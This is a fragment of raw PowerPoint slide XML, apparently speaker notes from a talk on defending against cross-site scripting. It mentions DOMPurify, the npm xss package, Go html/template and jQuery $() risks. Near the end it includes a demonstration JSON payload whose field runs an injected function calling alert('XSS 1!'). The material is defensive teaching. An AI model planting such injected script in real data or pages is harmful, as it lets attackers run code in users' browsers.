      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3194535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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212339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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157779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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26383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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330572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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="744908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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1461636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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2763974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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2858977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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577797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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999808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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31602140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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="769819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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157779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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21109697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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272052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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2210352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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1150997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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363783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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15777971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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7719008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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21634754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to Larry "Stallman" Bordowitz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17316731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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>golang.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>pkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/html/template/</a:t>
            </a:r>
          </a:p>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17531837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From @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>randomdross</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61219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a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15777971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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42142382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3"/>
              </a:rPr>
              <a:t>https://www.npmjs.com/package/xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/cure53/DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;div&gt;{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>myString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)}&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> &lt;div&gt;{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOMPurify.sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>myString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)}&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> &lt;div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>myString.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20212760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replace() safe or unsafe?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17626739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KEEP AWAY FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> INNER TEXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2755075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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tech.blog.box.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/2013/08/securing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-against-unintended-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2392790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CREDIT THIS TO DAVE WICHERS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note: The issue with $() is being worked on and will hopefully be much harder to exploit in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 1.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8785541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CREDIT THIS TO DAVE WICHERS and thank you to Alysia for finding the CAR typo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note: The issue with $() is being worked on and will hopefully be much harder to exploit in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 1.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17195898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CREDIT THIS TO DAVE WICHERS and thank you to Alysia for finding the CAR typo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note: The issue with $() is being worked on and will hopefully be much harder to exploit in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 1.8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11607290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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "user":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "name": "Johnny Walker",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "occupation": "Distiller",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "location": (function() { alert("XSS 1!"); return "somewhere"})(),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
